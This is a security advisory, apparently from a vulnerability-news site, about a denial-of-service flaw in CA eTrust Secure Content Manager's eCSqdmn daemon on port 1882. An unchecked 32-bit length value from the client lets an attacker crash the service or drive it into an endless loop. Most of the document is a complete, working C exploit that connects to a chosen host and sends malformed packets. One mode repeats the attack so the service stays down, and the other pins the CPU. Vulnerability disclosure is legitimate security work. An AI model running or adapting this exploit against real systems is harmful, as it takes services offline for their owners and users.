|
|
|
|
| |
| CA SCM "is a gateway product that secures, monitors, filters and blocks potential threats from messaging and Web traffic. It protects you against viruses, spam, phishing, P2P file sharing, malicious mobile code and prevents access to known spyware sites." A denial of service vulnerability in eTrust's Secure Content Manager (SCM) allows remote attackers to cause the product to crash by sending it malformed data. |
| |
Credit:
The information has been provided by Luigi Auriemma.
The original article can be found at: http://aluigi.altervista.org/adv/ecsqdamn-adv.txt
|
| |
Vulnerable Systems:
* CA eCSqdmn version 8.0.28000.511
The eTrust Common Services (Transport) Daemon (eCSqdmn) listening on port 1882 is affected by a vulnerability caused by an unchecked 32 bit number passed by the client which is used to advance on the next data block.
The effects resulting by the usage of a malformed value are the crashing of the service, which will be automatically restarted after
some seconds so the attacker needs to keep it down at regular intervals, or CPU at 100% caused by an endless loop in the continuous handling of the same data.
Exploit:
/*
by Luigi Auriemma - http://aluigi.org/poc/ecsqdamn.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#endif
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
#define VER "0.1"
#define PORT 1882
#define BUFFSZ 256
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int sec);
u32 resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len,
attack,
first = 1;
u16 port = PORT;
u8 buff[BUFFSZ],
*p;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"eTrust Secure Content Manager (eCSqdmn) <= 8.0.28000.511 Denial of Service "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%hu)]\n"
"\n"
"Attacks:\n"
" 1 = invalid memory access in eCSqdmn (will be kept down continuosly)\n"
" 2 = endless loop in eCSqdmn\n"
"\n", argv[0], port);
exit(1);
}
attack = atoi(argv[1]);
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));
for(;;) {
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
if(first) std_err();
printf("- retry connection\n");
sleep(ONESEC);
continue;
}
if(first) {
if(attack == 1) printf("- start attack for keeping the process down\n");
first = 0;
}
p = buff;
p += putxx(p, 0x0101, 16);
p += putxx(p, 0, 8);
p += putxx(p, 1, 8);
p += putxx(p, 1 + 4, 32);
p += putxx(p, 0, 32);
printf("- send header\n");
send(sd, buff, p - buff, 0);
p = buff;
p += putxx(p, 1, 8);
if(attack == 1) {
p += putxx(p, 99999999, 32);
} else {
p += putxx(p, -5, 32);
}
printf("- send data\n");
send(sd, buff, p - buff, 0);
while(!timeout(sd, 3)) {
len = recv(sd, buff, BUFFSZ, 0);
if(len <= 0) break;
}
close(sd);
if(attack == 2) break;
}
printf("- done\n");
return(0);
}
int putxx(u8 *data, u32 num, int bits) {
int i,
bytes;
bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff;
}
return(bytes);
}
int timeout(int sock, int sec) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = sec;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u32 resolv(char *host) {
struct hostent *hp;
u32 host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u32 *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
|
|
|
|
|
|
|
|
|
|
